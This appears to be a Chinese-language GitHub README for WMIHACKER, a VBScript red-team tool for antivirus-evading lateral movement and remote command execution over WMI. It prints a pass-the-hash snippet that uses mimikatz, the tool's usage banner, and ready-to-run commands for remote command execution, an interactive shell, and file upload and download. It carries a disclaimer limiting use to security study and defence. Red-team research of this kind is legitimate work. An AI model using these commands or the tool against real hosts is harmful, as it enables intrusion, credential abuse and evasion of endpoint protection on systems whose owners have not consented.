## WMIHACKER ![Language](https://img.shields.io/badge/Language-VBScript-blue) ![Author](https://img.shields.io/badge/Author-rootclay-orange) ![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github) ![Version](https://img.shields.io/badge/Version-V0.0.1-red) ![Time](https://img.shields.io/badge/Join-20221117-green) > 免责声明:本项目涉及的技术仅供安全学习与研究防御用途,禁止非法使用! 免杀横向移动命令执行测试工具(无需445端口) 介绍:免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口) 主要功能:1、命令执行;2、文件上传;3、文件下载;4、PTH使用 ## 使用 合并[Issue 1](https://github.com/360-Linton-Lab/WMIHACKER/issues/1)里PTH的使用方法: ```vbscript 第54-58行代码: if user = "-" And pass = "-" Then set objWMIService = objLocator.connectserver(host,"root/cimv2") Set SubobjSWbemServices = objLocator.ConnectServer(host, "root\subscription") Set regWMIService = objLocator.ConnectServer(host, "root\default") 用户名和密码填“-”,结合mimikatz的PTH就可以进行WMI的PTH了。 ``` ``` C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs __ ____ __ _____ _ _ _____ _ ________ _____ \ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \ \ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) | \ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ / \ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \ \/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\ v0.6beta By. Xiangshan@360RedTeam Usage: WMIHACKER.vbs /cmd host user pass command GETRES? WMIHACKER.vbs /shell host user pass WMIHACKER.vbs /upload host user pass localpath remotepath WMIHACKER.vbs /download host user pass localpath remotepath /cmd single command mode host hostname or IP address GETRES? Res Need Or Not, Use 1 Or 0 command the command to run on remote host ``` 有命令回显执行方式 `> cscript WMIHACKER_0.6.vbs /cmd administrator "Password!" "systeminfo" 1` 无命令回显 `> cscript WMIHACKER_0.6.vbs /cmd administrator "Password!" "systeminfo > c:\1.txt" 0` 模拟shell模式 `> cscript WMIHACKER_0.6.vbs /shell administrator "Password!" ` 文件上传-复制本机calc.exe到远程主机c:\calc.exe `> cscript wmihacker_0.4.vbe /upload administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"` 文件下载-下载远程主机calc.exe到本地c:\calc.exe `> cscript wmihacker_0.4.vbe /download administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe" ` ## 项目相关 ## 最近更新